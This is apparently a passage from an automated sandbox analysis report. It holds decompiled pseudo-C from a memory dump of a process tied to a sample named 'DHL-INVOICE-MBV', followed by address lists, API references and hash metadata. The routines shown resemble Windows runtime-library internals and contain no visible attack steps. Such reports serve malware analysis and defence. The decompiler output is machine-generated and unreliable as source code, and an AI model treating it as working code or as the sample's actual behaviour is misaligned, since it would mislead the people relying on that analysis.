																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x1d8991e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E1D87AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E1D87ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E1D87AC6F(_t31) == 0) {
									_t364 = 0;
								}
								L1D7A52F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E1D87ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}

0x1d87acf4
0x1d87acf6
0x1d87acfb
0x1d87acfe
0x1d87ad05
0x1d87ad05
0x1d87ad08
0x1d87ad0e
0x1d87ad6f
0x1d87ad6f
0x1d87ad72
0x1d87adc8
0x1d87adce
0x1d87add0
0x1d87add0
0x1d87add3
0x1d87add7
0x1d87adda
0x1d87addf
0x1d87ade1
0x1d87ade1
0x1d87ade1
0x1d87ade1
0x1d87adec
0x1d87adf0
0x1d87adf2
0x1d87adf5
0x1d87adf8
0x1d87adfd
0x00000000
0x00000000
0x1d87adff
0x1d87ae04
0x1d87ae69
0x1d87ae6b
0x1d87ae6d
0x1d87ae8b
0x1d87ae8b
0x1d87ae8f
0x1d87ae97
0x1d87ae9a
0x1d87aea9
0x1d87aeb1
0x1d87aeb3
0x1d87aeb8
0x1d87aec8
0x1d87aec9
0x1d87aeca
0x1d87aed6
0x1d87aedb
0x1d87aede
0x1d87aeea
0x1d87aef9
0x1d87aefe
0x1d87af01
0x1d87af03
0x1d87af03
0x1d87af03
0x1d87af0e
0x1d87af12
0x1d87af15
0x1d87af17
0x1d87af1a
0x1d87af1f
0x1d87af5b
0x1d87af5b
0x1d87af5e
0x1d87af5e
0x1d87af66
0x00000000
0x00000000
0x1d87af6f
0x1d87af75
0x1d87af77
0x1d87afae
0x1d87afae
0x1d87afb0
0x1d87afb3
0x1d87afb3
0x1d87afb6
0x1d87afb6
0x1d87afb9
0x1d87afbc
0x1d87afbf
0x1d87afc4
0x1d87afcc
0x1d87b11b
0x1d87b128
0x1d87b12d
0x1d87b12f
0x1d87b132
0x1d87b135
0x1d87b15e
0x1d87b160
0x1d87b160
0x1d87b166
0x1d87b168
0x1d87b16b
0x1d87b16d
0x1d87b16f
0x1d87b16f
0x1d87b173
0x1d87b17a
0x1d87b17c
0x1d87b180
0x1d87b185
0x1d87b18b
0x1d87b18b
0x1d87b18d
0x1d87b193
0x1d87b193
0x1d87afd4
0x1d87afdc
0x1d87afe3
0x00000000
0x00000000
0x1d87afe9
0x1d87afef
0x1d87aff3
0x1d87aff3
0x1d87afff
0x1d87b005
0x1d87b007
0x1d87b009
0x1d87b00e
0x1d87b194
0x1d87b194
0x1d87b19a
0x00000000
0x00000000
0x1d87b1a0
0x1d87b1a3
0x00000000
0x1d87b014
0x1d87b014
0x1d87b014
0x1d87b019
0x1d87b02c
0x1d87b033
0x1d87b035
0x1d87b035
0x1d87b03a
0x1d87b03c
0x1d87b049
0x1d87b052
0x1d87b056
0x1d87b058
0x1d87b067
0x1d87b067
0x1d87b070
0x1d87b07b
0x1d87b07e
0x1d87b0ec
0x1d87b0ec
0x1d87b0ec
0x1d87b0f2
0x1d87b0f5
0x1d87b0fb
0x1d87b0fe
0x1d87b100
0x1d87b105
0x1d87b110
0x1d87b116
0x1d87b118
0x1d87b118
0x1d87b118
0x00000000
0x00000000
0x00000000
0x00000000
0x1d87b080
0x1d87b080
0x1d87b080
0x1d87b080
0x1d87b083
0x1d87b086
0x1d87b086
0x1d87b089
0x1d87b092
0x00000000
0x00000000
0x1d87b096
0x1d87b09c
0x1d87b0a7
0x1d87b0b0
0x1d87b0ca
0x1d87b0cc
0x1d87b0d2
0x1d87b0d6
0x1d87b0d9
0x1d87b0d9
0x1d87b0de
0x1d87b0de
0x1d87b0e1
0x1d87b0e2
0x1d87b0e8
0x00000000
0x1d87b05a
0x1d87b05a
0x1d87b05d
0x1d87b05d
0x1d87b05e
0x1d87b060
0x1d87b063
0x00000000
0x1d87b05d
0x1d87b058
0x1d87b01b
0x1d87b020
0x1d87b027
0x1d87b02a
0x00000000
0x00000000
0x00000000
0x00000000
0x1d87b022
0x1d87b022
0x1d87b022
0x1d87b023
0x1d87b023
0x00000000
0x1d87b022
0x1d87b00e
0x00000000
0x1d87af77
0x1d87af71
0x1d87af73
0x00000000
0x1d87af73
0x1d87af21
0x1d87af26
0x1d87af8c
0x1d87af8e
0x1d87af90
0x00000000
0x00000000
0x1d87af92
0x1d87af95
0x1d87af9a
0x1d87af9c
0x1d87afa1
0x1d87afa7
0x1d87afa7
0x00000000
0x1d87afa1
0x1d87af4d
0x1d87af52
0x1d87af55
0x1d87af58
0x00000000
0x1d87af79
0x1d87af7d
0x1d87af82
0x00000000
0x1d87af8a
0x1d87aeba
0x00000000
0x1d87aeba
0x1d87ae6f
0x1d87ae6f
0x1d87ae79
0x1d87ae7b
0x1d87ae7b
0x1d87ae81
0x00000000
0x1d87ae81
0x1d87ae2b
0x1d87ae30
0x1d87ae33
0x1d87ae36
0x1d87ae39
0x1d87ae39
0x1d87ae3c
0x1d87ae3c
0x1d87ae44
0x00000000
0x00000000
0x1d87ae4d
0x1d87ae53
0x1d87ae55
0x00000000
0x00000000
0x1d87ae5b
0x1d87ae62
0x00000000
0x00000000
0x00000000
0x1d87ae64
0x1d87ae4f
0x1d87ae51
0x00000000
0x1d87ae51
0x1d87ade1
0x1d87ad74
0x1d87ad77
0x1d87adbf
0x1d87adc5
0x1d87adc7
0x00000000
0x1d87adc7
0x1d87ad79
0x1d87ad7c
0x1d87adb6
0x1d87adbc
0x1d87adbe
0x00000000
0x1d87adbe
0x1d87ad7e
0x1d87ad81
0x1d87adad
0x1d87adb3
0x1d87adb5
0x00000000
0x1d87adb5
0x1d87ad83
0x1d87ad86
0x1d87ada4
0x1d87adaa
0x1d87adac
0x00000000
0x1d87adac
0x1d87ad88
0x1d87ad8b
0x1d87ad9b
0x1d87ada1
0x1d87ada3
0x00000000
0x1d87ada3
0x1d87ad90
0x00000000
0x1d87ad92
0x1d87ad98
0x1d87ad9a
0x00000000
0x1d87ad9a
0x1d87ad10
0x1d87ad12
0x1d87ad18
0x1d87ad1a
0x1d87ad54
0x1d87ad59
0x1d87ad5f
0x1d87ad63
0x1d87ad68
0x1d87ad6a
0x1d87ad6a
0x00000000
0x1d87ad1a

APIs

RtlDebugPrintTimes.NTDLL ref: 1D87AEA9
RtlDebugPrintTimes.NTDLL ref: 1D87B185

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b2d1e8fa37555d49403259c64dfb2ae6fcfcae62107717c385427caf2fb7337c
Instruction ID: 4eb52ee742809f4c6aa1cd269e257e403e2f31f058c2ef4cc07dac8d398958b9
Opcode Fuzzy Hash: b2d1e8fa37555d49403259c64dfb2ae6fcfcae62107717c385427caf2fb7337c
Instruction Fuzzy Hash: 39F1D773E006559FCB18CFA8C99067EFBF6AF88310B1A416DE49ADB390D634E941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1D7CEE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1D7CEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1d87c610);
				E1D7F7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1D7B2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1D7B24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1d8967f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1d8967f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1d8967f0; // 0x0
							_t309 =  *0x1d8967f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x17ef7a0
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						L1D7CF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1d8991e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17f074c
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1D7B24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1D7B2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1D7B2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1D7B24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1D7B2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17f074c
										E1D82C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17f074c
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17f074c
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1D7CF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x17ef7a0
									_t86 = _t255 + 0x10; // 0x17f074c
									 *0x1d8991e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1d8991e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1d8991e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1D7B3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17f074c
										_t250 = E1D82C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1D7CF1DB(_t250);
									_t228 = E1D7CF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x17f074c
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x1d7cee48
0x1d7cee4a
0x1d7cee4f
0x1d7cee54
0x1d7cee56
0x1d7cee5b
0x1d7cee60
0x1d7cee63
0x1d7cee66
0x1d7cee68
0x1d7cee70
0x1d7cee73
0x1d7cee76
0x1d7cee79
0x1d7cee80
0x1d7cee85
0x1d7cee88
0x00000000
0x1d7cee8b
0x1d7cee93
0x1d7cee98
0x1d7cee9f
0x1d7ceeac
0x1d7ceeb8
0x1d7ceeb8
0x1d7ceebe
0x1d7ceec6
0x1d7ceec9
0x1d7ceec9
0x1d7ceece
0x1d7ceece
0x1d7ceece
0x1d7ceece
0x1d7ceece
0x1d7ceece
0x1d7ceed3
0x1d7ceed6
0x1d7ceedb
0x1d7ceee0
0x1d7ceee6
0x1d7ceeee
0x1d7ceeee
0x1d7ceef0
0x1d7ceef4
0x1d7ceef6
0x00000000
0x00000000
0x1d7cf1dc
0x1d7cf1dc
0x1d7ceefc
0x1d7ceefc
0x1d7cef01
0x1d7cef03
0x1d7cef06
0x1d7cef09
0x1d7cef0c
0x1d7cef0f
0x1d7cef0f
0x1d7cef16
0x1d7cef16
0x1d7cef1b
0x1d7cef20
0x1d7cef26
0x1d7cef29
0x1d7cef2c
0x1d7cef2c
0x1d7cef36
0x1d7cef36
0x1d7cef3b
0x1d7cef40
0x1d7cef46
0x1d7cef4c
0x1d7cef54
0x1d7cef57
0x1d7cef59
0x1d7cef60
0x1d7cef63
0x1d7cef63
0x1d7cef66
0x1d7cef69
0x1d7cef6c
0x1d7cf113
0x1d7cf113
0x1d7cf115
0x1d7cf122
0x1d7cf127
0x1d7cf12b
0x1d80fe64
0x1d80fe6a
0x1d80fe6a
0x00000000
0x1d7cf12b
0x1d7cef72
0x1d7cef74
0x00000000
0x00000000
0x1d7cef7a
0x1d7cef7d
0x1d7cef7d
0x1d7cef7d
0x1d7cef81
0x1d7cf144
0x1d7cf144
0x1d7cf14a
0x1d80fd20
0x1d80fd23
0x1d7cef90
0x1d7cef90
0x1d7cef93
0x1d80fd2e
0x1d80fd31
0x00000000
0x00000000
0x1d80fd37
0x1d80fd45
0x1d80fd4b
0x1d80fd4b
0x1d80fd4e
0x00000000
0x00000000
0x00000000
0x1d80fd54
0x1d80fd3c
0x1d80fd3f
0x00000000
0x00000000
0x00000000
0x1d80fd3f
0x1d7cef99
0x1d7cef99
0x1d7cef9c
0x1d7cf1a6
0x1d7cf1a9
0x00000000
0x00000000
0x00000000
0x1d7cf1af
0x1d7cefa2
0x1d7cefa2
0x1d7cefa5
0x1d7cefab
0x1d7cefae
0x1d7cefb4
0x1d7cefba
0x1d7cefc0
0x1d7cefc6
0x1d7cefcc
0x1d7cefd8
0x1d7cefde
0x1d7cefe1
0x1d7cefe7
0x1d7cefe9
0x1d7cefec
0x1d7ceff3
0x1d7ceff8
